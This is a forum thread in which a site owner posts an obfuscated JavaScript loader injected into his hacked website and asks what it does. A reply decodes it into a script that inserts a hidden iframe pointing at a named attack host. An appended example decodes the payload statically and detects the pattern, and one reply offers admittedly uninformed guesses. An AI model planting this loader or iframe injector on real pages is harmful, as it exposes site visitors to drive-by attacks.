Topic: Solve a mystery! Website hacked and java script added to index

LordBucket

Wow, ok...so, a website I made years ago was just reported by google as being malicious. So I've just spent the last several hours digging through logs and cleaning scripts from html files. There were a number of things going on, some of which I could identify, some of which I couldn't. In particular, the following script was being executed from the machine of some Lithuanian psychotherapist, followed by a search php script on a church website in Indonesia:

Code:
v=document.createTextNode('asd');var s;for(i in v)if(v[i]=='#text')b=1;b*=2;aa=document.createTextNode("ev"+"a"+"l");e=window[aa.nodeValue];e(String.fromCharCode(11-b,11-b,107-b,104-b,34-b,42-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b,100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,43-b,125-b,11-b,11-b,11-b,107-b,104-b,116-b,99-b,111-b,103-b,116-b,42-b,43-b,61-b,11-b,11-b,127-b,34-b,103-b,110-b,117-b,103-b,34-b,125-b,11-b,11-b,11-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,121-b,116-b,107-b,118-b,103-b,42-b,36-b,62-b,107-b,104-b,116-b,99-b,111-b,103-b,34-b,117-b,116-b,101-b,63-b,41-b,106-b,118-b,118-b,114-b,60-b,49-b,49-b,117-b,123-b,111-b,111-b,103-b,118-b,116-b,99-b,112-b,119-b,118-b,48-b,119-b,112-b,107-b,48-b,101-b,101-b,49-b,107-b,112-b,48-b,101-b,105-b,107-b,65-b,52-b,41-b,34-b,121-b,107-b,102-b,118-b,106-b,63-b,41-b,51-b,50-b,41-b,34-b,106-b,103-b,107-b,105-b,106-b,118-b,63-b,41-b,51-b,50-b,41-b,34-b,117-b,118-b,123-b,110-b,103-b,63-b,41-b,120-b,107-b,117-b,107-b,100-b,107-b,110-b,107-b,118-b,123-b,60-b,106-b,107-b,102-b,102-b,103-b,112-b,61-b,114-b,113-b,117-b,107-b,118-b,107-b,113-b,112-b,60-b,99-b,100-b,117-b,113-b,110-b,119-b,118-b,103-b,61-b,110-b,103-b,104-b,118-b,60-b,50-b,61-b,118-b,113-b,114-b,60-b,50-b,61-b,41-b,64-b,62-b,49-b,107-b,104-b,116-b,99-b,111-b,103-b,64-b,36-b,43-b,61-b,11-b,11-b,127-b,11-b,11-b,104-b,119-b,112-b,101-b,118-b,107-b,113-b,112-b,34-b,107-b,104-b,116-b,99-b,111-b,103-b,116-b,42-b,43-b,125-b,11-b,11-b,11-b,120-b,99-b,116-b,34-b,104-b,34-b,63-b,34-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,101-b,116-b,103-b,99-b,118-b,103-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,42-b,41-b,107-b,104-b,116-b,99-b,111-b,103-b,41-b,43-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,117-b,116-b,101-b,41-b,46-b,41-b,106-b,118-b,118-b,114-b,6
0-b,49-b,49-b,117-b,123-b,111-b,111-b,103-b,118-b,116-b,99-b,112-b,119-b,118-b,48-b,119-b,112-b,107-b,48-b,101-b,101-b,49-b,107-b,112-b,48-b,101-b,105-b,107-b,65-b,52-b,41-b,43-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,120-b,107-b,117-b,107-b,100-b,107-b,110-b,107-b,118-b,123-b,63-b,41-b,106-b,107-b,102-b,102-b,103-b,112-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,114-b,113-b,117-b,107-b,118-b,107-b,113-b,112-b,63-b,41-b,99-b,100-b,117-b,113-b,110-b,119-b,118-b,103-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,110-b,103-b,104-b,118-b,63-b,41-b,50-b,41-b,61-b,104-b,48-b,117-b,118-b,123-b,110-b,103-b,48-b,118-b,113-b,114-b,63-b,41-b,50-b,41-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,121-b,107-b,102-b,118-b,106-b,41-b,46-b,41-b,51-b,50-b,41-b,43-b,61-b,104-b,48-b,117-b,103-b,118-b,67-b,118-b,118-b,116-b,107-b,100-b,119-b,118-b,103-b,42-b,41-b,106-b,103-b,107-b,105-b,106-b,118-b,41-b,46-b,41-b,51-b,50-b,41-b,43-b,61-b,11-b,11-b,11-b,102-b,113-b,101-b,119-b,111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b,112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b,100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,48-b,99-b,114-b,114-b,103-b,112-b,102-b,69-b,106-b,107-b,110-b,102-b,42-b,104-b,43-b,61-b,11-b,11-b,127-b));

I don't speak java, but it looks to me like it's simply creating a string of text. However, after some experimenting with document.write on w3schools.com, I've yet to get the above to evaluate to anything legible. My best guess is that the intent of the designer was to create some string of text, then pipe it to the search engine on the Indonesian webpage, presumably in an attempt to manipulate their result rankings. However, I don't see any indication of that actually happening, no attempt to pipe the text to the search, just two scripts executing in isolation.

Is anyone able to make sense of this?

I did find reference to two other scripts in the log files, lulu/poisonous.php and dixons/whirpool.php, but unfortunately these scripts didn't exist by the time I got to this. But here's one of the error log entries:

Code:
PHP Warning:  file_get_contents(http://webchecker3.net/?file_get_contents) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: no suitable wrapper could be found in /home/jandjboo/public_html/dixons/whirpool.php on line 42

Dixon is a company, and they do apparently do repairs for Whirlpool appliances. But I don't immediately see how that connects to anything. I've identified the most likely security hole that allowed the site to be compromised in the first place, I have a huge pile of ftp logs listing which IPs did what and when, and for fun I've geolocated them to various parts of Lithuania and the Ukraine. But given the number of actions executed in few enough seconds, I get the impression bots were involved.

What I don't know is what they were trying to accomplish.

What does the above code translate to?

thatkid
Re: Solve a mystery! Website hacked and java script added to index
« Reply #1 on: August 06, 2011, 01:08:19 am »

Looks like incompetent bots were just being incompetent.

Itnetlolor
Re: Solve a mystery! Website hacked and java script added to index
« Reply #2 on: August 06, 2011, 02:40:11 pm »

Just taking a wild guess, that looks like a trojan that when accessed by other users, acquires or deposits the necessary files to expand their ad popping up more often. They clean up the tracks when their task is done, but leave fragments behind to evolve into something harder to detect. Run Spybot/Malwarebytes to be safe.

At least, that's what the PHP thing leads me to believe. I don't have any real experience in the field, but I do recognize that PHP is a method of getting files, though I would imagine it could also be used to deposit files as well. Considering the types of companies, it sounds like an ad-virus which spreads via contact.

Like I said, just taking a wild guess or a shot in the dark.

Mephisto
Re: Solve a mystery! Website hacked and java script added to index
« Reply #3 on: August 07, 2011, 12:16:55 am »

b = 2 at the end of the first few statements. The big list of numbers with b subtracted from them is turned into a string, which is then `eval`uated. The string:

Code:
if(document.getElementsByTagName('body')[0]) {
    iframer();
}
else {
    document.write("");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://symmetranut.uni.cc/in.cgi?2');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Spacing added by me to render this actually readable.

I do not advocate navigating to the link contained within. It is, quite obviously, listed as an attack site. I did not press my luck further.
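The decoding Mephisto describes, done statically in Node.js as an added example (not code from the thread): it reads the offset b out of the loader's prologue and subtracts it from each term itself, so the sample is never executed. The sample is the prologue plus the first 48 terms of the payload quoted in the first post; the function names are this example's own.

```javascript
// Added example (not code from the thread): decode the injected loader
// statically, the way Mephisto's post describes, instead of letting it eval.
// The loader sets b=1 if any enumerable property of a text node equals
// '#text' (nodeName does in a browser), doubles it, then subtracts b from
// every String.fromCharCode term. So b only exists inside a real DOM;
// here we read it out of the prologue and do the arithmetic ourselves.

// Constructed sample: the loader's prologue plus the first 48 terms of the
// payload quoted above (the rest of the list is truncated here).
const SAMPLE =
  "v=document.createTextNode('asd');var s;for(i in v)if(v[i]=='#text')b=1;b*=2;" +
  'aa=document.createTextNode("ev"+"a"+"l");e=window[aa.nodeValue];' +
  "e(String.fromCharCode(11-b,11-b,107-b,104-b,34-b,42-b,102-b,113-b,101-b,119-b," +
  "111-b,103-b,112-b,118-b,48-b,105-b,103-b,118-b,71-b,110-b,103-b,111-b,103-b," +
  "112-b,118-b,117-b,68-b,123-b,86-b,99-b,105-b,80-b,99-b,111-b,103-b,42-b,41-b," +
  "100-b,113-b,102-b,123-b,41-b,43-b,93-b,50-b,95-b,43-b,125-b));";

// Recover the offset from the "b=1;b*=2;" prologue without running it.
function recoverOffset(script) {
  const m = script.match(/\)b=(\d+);b\*=(\d+);/);
  if (!m) throw new Error("offset prologue not recognised");
  return Number(m[1]) * Number(m[2]);
}

// Pull the argument list out of String.fromCharCode(...) and decode each
// "N-b" term; a term that is not of that form is reported, not guessed.
function decodeLoader(script) {
  const b = recoverOffset(script);
  const m = script.match(/String\.fromCharCode\(([^)]*)\)/);
  if (!m) throw new Error("no String.fromCharCode(...) call found");
  return m[1].split(",").map((term) => {
    const t = term.trim().match(/^(\d+)-b$/);
    if (!t) throw new Error("unexpected term: " + term);
    return String.fromCharCode(Number(t[1]) - b);
  }).join("");
}

// Triage check for the same pattern in other files: the split "ev"+"a"+"l"
// string, the window[...] lookup and a fromCharCode list are its hallmarks.
function looksLikeCharCodeLoader(script) {
  return /"ev"\+"a"\+"l"/.test(script) &&
    /window\[/.test(script) &&
    /String\.fromCharCode\(/.test(script);
}

console.log(JSON.stringify(decodeLoader(SAMPLE)));
```

Run over the whole list from the first post, the same function yields the script Mephisto reconstructed; the triage check is cheap enough to run over every HTML file on the server when cleaning up.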